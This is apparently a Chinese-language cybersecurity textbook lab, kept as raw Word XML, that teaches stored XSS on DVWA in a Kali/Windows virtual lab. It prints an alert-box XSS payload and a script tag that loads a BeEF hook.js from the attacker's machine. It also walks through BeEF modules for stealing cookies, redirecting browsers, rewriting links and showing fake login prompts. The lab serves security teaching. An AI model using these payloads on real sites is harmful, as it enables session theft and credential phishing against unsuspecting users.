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0" w:name="_Toc27095558"/>
      <w:bookmarkStart w:id="1" w:name="_Toc31542"/>
      <w:bookmarkStart w:id="2" w:name="_Toc27096335"/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实训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25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储型XSS攻防实训</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeas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场景描述：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在虚拟机环境下配置3个虚拟系统“WinXP3”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、“Win7”和“Kali”，使得3个系统之间能够相互通信。本实训在如图12-14所示的场景中实现。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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:162.8pt;width:356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图12-15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网络拓扑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center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3" w:name="_Toc27096336"/>
      <w:bookmarkStart w:id="4" w:name="_Toc846"/>
      <w:bookmarkStart w:id="5" w:name="_Toc27095559"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务1 存储型XSS攻防的初步认识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/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1.在Kali中访问WinXP3的DVWA主页，设置DVWA Security为“Low”，然后打开XSS（Stored），查看服务器核心源码，可以看到，该页面对输入并没有做XSS方面的过滤与检查，而且把输入的数据存储在服务器的数据库中，因此这里存在明显的存储型XSS漏洞。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2.漏洞利用，在Message文本框中输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，然后单击“Sign Guestbook”按钮 ，成功弹出对话框。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3.因为脚本已经写到服务器的数据库中，因此当其他用户访问该页面时也会弹框。当我们在Win7中打开DVWA的XSS（Stored）时，发现也会弹框。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4.分别设置DVWA Security为“Medium”和“High”，由于message参数使用了htmlspecialchars函数进行编码，因此无法通过message参数注入XSS代码，但是对于name参数并没有严格过滤，仍然参在存储型XSS漏洞，其绕过的方法与反射型XSS的绕过方法相似，这里就不再重复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center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9" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkStart w:id="6" w:name="_Toc11468"/>
      <w:bookmarkStart w:id="7" w:name="_Toc27095560"/>
      <w:bookmarkStart w:id="8" w:name="_Toc27096337"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务2 利用BeEF实现对受害机的控制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/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 在Kali中的打开BeEF工具，在终端中显示了管理页面以及可以使用的脚本信息，如图12-1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>所示。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4976495" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="14605" b="762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图12-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>运行BeEF工具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2.在管理页面中输入登录信息进入BeEF管理平台，用户名和密码都是“beef”，如图12-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所示。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4200525" cy="3027045"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"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689" cy="30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图12-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>登录管理平台BeEF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. 在Kali中打开WinXP3的DVWA主页。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>. 设置DVWA Security为“Low”，然后打开XSS（Stored），由于Message文本框的长度限制为50，因此在Message文本框中右击，选择“Inspect Element”，然后修改长度限制为“500”。Name文本框中输入“xss”（可以随意输入），在Message文本框中输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script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src=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.0.4:3000/hook.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"&gt;&lt;/script&gt;”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，如图12-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所示。并点击“Sign Guestbook”按钮，此时把脚本保存到数据库里面。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1770" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0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图12-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8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插入X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>脚本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>.受害者在Win7(受害者)中打开WinXP3的DVWA。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>.当受害者打开XSS（Stored）页面时，自动执行脚本访问了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ali的hook.js钩子页面，连接到攻击主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ali。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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ali的BeEF的管理页面中，发现了被攻击主机的图标，攻击成功如图1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2-19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所示。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4310" cy="2585720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2-19 XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击成功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8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在被钩住的持续时间，受害主机被控制了，攻击者可以发送攻击命令。选择“Command”选项卡，可以看到很多已经分好类的攻击模块，如图12-20所示，攻击命令的颜色含义如下：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绿色：该攻击模块命令可用，而隐蔽性强。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橘色：该攻击模块命令可用，但受害者可能会发现它。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橙色：该攻击模块是否可用需待验证，可以直接实验。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灰色：该攻击模块不可用。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5274310" cy="2573020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1778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图12-20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BeEF界面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BeEF的功能非常强大，这里我们只介绍其中的几个功能。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点击Browser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→ Hooked Domain → Get Cookie，然后点击右下角的Execute，获取受害者的Cookie。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点击Browse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r→ Hooked Domain → Redirect Browser，输入百度的网址，然后点击右下角的Execute，受害的浏览器的页面就会跳转到百度的页面。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点击Browser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→ Hooked Domain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→ Replace HREFs，输入百度的网址然后点击右下角的Execute，受害者的浏览器的该页面的超链接会链接到到百度的页面。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点击Social Engiineering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→ Pretty Theft ，右上角选择弹窗的类型，右下角点击 Execute，能够社工弹窗，欺骗受害者输入用户名和密码信息。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91DC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D091DC2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A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unhideWhenUsed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2021-06-07T15:58:05Z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76D15B80517C4AE5992BD6BDA0A66378</vt:lpwstr>
  </property>
</Properties>
</file>